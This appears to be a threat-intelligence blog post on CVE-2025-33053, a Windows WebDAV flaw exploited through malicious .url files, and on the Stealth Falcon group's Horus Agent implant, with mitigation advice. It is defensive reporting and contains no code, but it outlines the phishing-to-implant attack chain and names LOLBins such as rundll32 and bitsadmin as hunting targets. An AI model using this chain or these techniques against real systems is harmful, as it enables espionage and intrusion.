🧩 1. What is CVE‑2025‑33053?
In March 2025, security researchers at Check Point identified a zero‑day vulnerability in Microsoft’s WebDAV implementation. Tracked as CVE‑2025‑33053 (CVSS 8.8), it allows attackers to execute remote code by manipulating Windows' working directory while interacting with malicious .url files hosted on WebDAV servers.
Microsoft patched it during June’s Patch Tuesday (June 10) across all supported—and even some out-of-support—Windows versions
🎯 2. Enter Stealth Falcon
Stealth Falcon (a.k.a. Fruity Armor or Project Raven) is a UAE‑linked APT group active since at least 2012. They’ve targeted Emirati dissidents, journalists, government, and defense bodies across the Middle East and Africa—especially in Turkey, Qatar, Egypt, and Yemen .
Their typical attack chain:
- Spear‑phishing emails carrying deceptive .url files or links.
- Users click → triggers CVE‑2025‑33053 → code execution via WebDAV sustained through stealthy built‑in binaries.
- Deploy advanced implants, including one known as “Horus Agent.”
🦅 3. Horus: A Mythic C2 Implant
Post‑exploit, Stealth Falcon deploys malware tied to the open‑source Mythic C2 framework, specifically a custom backdoor dubbed Horus Agent—named after the Egyptian sky god, echoing their avian theme
Key capabilities:
- Module‑based operation: Downloads functionalities dynamically (keylogger, credential dumper, file reader).
- Living‑off‑the‑land (LOLBins) use to evade security tools.
- Anti‑analysis features including sandbox evasion and encrypted communications.
🛡️ 4. The “Deadglyph” Connection
Earlier in 2023, ESET documented “Deadglyph,” another advanced Stealth Falcon implant that uses homoglyph tricks (e.g., spoofing “Microsoft Corporation”) and modular architecture—a harbinger of Horus’s sophistication
🌍 5. Implications & Mitigation
| Risk | Recommendation |
|---|---|
| Government/Defense targets in ME/Africa | Enforce phishing defenses, patch WebDAV CVE‑2025‑33053 urgently |
| Implant spread via phishing | Monitor for suspicious .url/LOLBin use; implement UEBA & network segmentation |
| Dynamic implants | Employ endpoint detection, XDR, and threat hunting pipelines (YARA, grep filters etc.) |
- Patch immediately—including legacy OS like Win 8/Server 2012, given Microsoft’s broad patch coverage
- Enhance email filtering and train users to spot spear-phishing.
- Enable threat hunting: watch for unusual WebDAV calls, suspicious URL file behaviors, abnormal process patterns (like rundll32, bitsadmin).
- Invest in XDR/EPP solutions to catch stealthy C2 and module-based tools like Horus.
✍️ 6. Conclusion
CVE‑2025‑33053 is now weaponized by Stealth Falcon in a targeted, high-stakes espionage campaign aimed at Middle East defense and government entities. Their latest implant, Horus Agent, embodies stealth, modularity, and deep system compromise.
This saga reflects an evolving cyber threat landscape where nation-linked APTs quickly turn zero-days into full-scale spying operations. Organizations in the region must act now: patch diligently, fortify email defenses, and deploy vigilant detection to counter this persistent and sophisticated adversary.